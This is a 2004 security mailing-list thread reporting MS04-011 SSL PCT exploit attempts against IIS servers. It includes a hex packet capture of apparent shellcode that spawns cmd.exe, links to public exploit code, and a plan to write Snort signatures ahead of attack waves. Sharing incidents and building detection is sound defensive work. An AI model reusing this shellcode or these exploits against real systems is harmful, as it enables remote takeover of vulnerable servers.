Re: Heads up: Looks like MS04-011 exploit is being tried againstwww.domain

["Clint Bodungen" <clint () secureconsulting com>]

Just FYI:  I've been able to successfully predict many of these incidents by
regularly monitoring several lists and sites that new exploits get posted to
such
as the full-disclosure mailing list.  It never fails... a new exploit
is posted on these lists and anywhere from hours do a few days later
we get a flood of related incidents.  I have scripts that monitor about 50
different locations for these exploits and the results are at
http://rootexploit.net/.  They update every hour and we usually discuss
them in the forum and send out advance notices throughout all the members.
We're talking about using this advance notice to either start writing
advance Snort signatures for these exploits that are released in preparation
for possible attack waves (or at least prompt a few intrested members to).



----- Original Message ----- 
From: <falcon () secureconsulting net>
To: "James Riden o" <j.riden () massey ac nz>
Cc: <incidents () securityfocus com>
Sent: Tuesday, April 27, 2004 9:54 AM
Subject: Re: Heads up: Looks like MS04-011 exploit is being tried
againstwww.domain


> This appears to be from the THC exploit for SSL PCT released last week.
> http://packetstormsecurity.nl/filedesc/THCIISSLame.c.html
> Running strings against the binary and grep'ing for "THCOWNZIIS!"
> indicated the match.
>
> Also be aware that what appears to be PERL-based exploit code is now
> readily available, too, for this vulnerability.
> http://www.k-otik.com/exploits/04242004.iis5x_ssl_pct.pm.php
>
> Our experience testing the original THC code indicated that vulnerable
> systems could be compromised in a matter of seconds.
>
> > Seen as long ago as 25/04/2004. Haven't seen it used against any other
> > servers here, so it's obviously targetted in some way. Example packet
> > capture:
> >
> > 000 : 80 62 01 02 BD 00 01 00 01 00 16 8F 82 01 00 00   .b..............
> > 010 : 00 EB 0F 54 48 43 4F 57 4E 5A 49 49 53 21 32 5E   ...THCOWNZIIS!2^
> > 020 : BE 98 EB 25 03 E7 3E D8 08 24 02 06 6C 59 6C 59   ...%..>..$..lYlY
> > 030 : F8 1D 9C DE 8C D1 4C 70 D4 03 58 46 57 53 32 5F   ......Lp..XFWS2_
> > 040 : 33 32 2E 44 4C 4C 01 EB 05 E8 F9 FF FF FF 5D 83   32.DLL........].
> > 050 : ED 2C 6A 30 59 64 8B 01 8B 40 0C 8B 70 1C AD 8B   .,j0Yd...@..p...
> > 060 : 78 08 8D 5F 3C 8B 1B 01 FB 8B 5B 78 01 FB 8B 4B   x.._<.....[x...K
> > 070 : 1C 01 F9 8B 53 24 01 FA 53 51 52 8B 5B 20 01 FB   ....S$..SQR.[ ..
> > 080 : 31 C9 41 31 C0 99 8B 34 8B 01 FE AC 31 C2 D1 E2   1.A1...4....1...
> > 090 : 84 C0 75 F7 0F B6 45 09 8D 44 45 08 66 39 10 75   ..u...E..DE.f9.u
> > 0a0 : E1 66 31 10 5A 58 5E 56 50 52 2B 4E 10 41 0F B7   .f1.ZX^VPR+N.A..
> > 0b0 : 0C 4A 8B 04 88 01 F8 0F B6 4D 09 89 44 8D D8 FE   .J.......M..D...
> > 0c0 : 4D 09 75 BE FE 4D 08 74 17 FE 4D 24 8D 5D 1A 53   M.u..M.t..M$.].S
> > 0d0 : FF D0 89 C7 6A 02 58 88 45 09 80 45 79 0C EB 82   ....j.X.E..Ey...
> > 0e0 : 89 CE 31 DB 53 53 53 53 56 46 56 FF D0 89 C7 55   ..1.SSSSVFV....U
> > 0f0 : 58 66 89 30 6A 10 55 57 FF 55 E0 8D 45 88 50 FF   Xf.0j.UW.U..E.P.
> > 100 : 55 E8 55 55 FF 55 EC 8D 44 05 0C 94 53 68 2E 65   U.UU.U..D...Sh.e
> > 110 : 78 65 68 5C 63 6D 64 94 31 D2 8D 45 CC 94 57 57   xeh\cmd.1..E..WW
> > 120 : 57 53 53 FE CA 01 F2 52 94 8D 45 78 50 8D 45 88   WSS....R..ExP.E.
> > 130 : 50 B1 08 53 53 6A 10 FE CE 52 53 53 53 55 FF 55   P..SSj...RSSSU.U
> > 140 : F0 6A FF FF 55 E4                                 .j..U.
> >
> > --
> > James Riden / j.riden () massey ac nz / Systems Security Engineer
> > GPG public key available at: http://www.massey.ac.nz/~jriden/
> > This post does not necessarily represent the views of my employer.
>
> --------------------------------------------------------------------------
-
> --------------------------------------------------------------------------
--
> >
>
>
> --------------------------------------------------------------------------
-
> --------------------------------------------------------------------------
--
>


---------------------------------------------------------------------------
----------------------------------------------------------------------------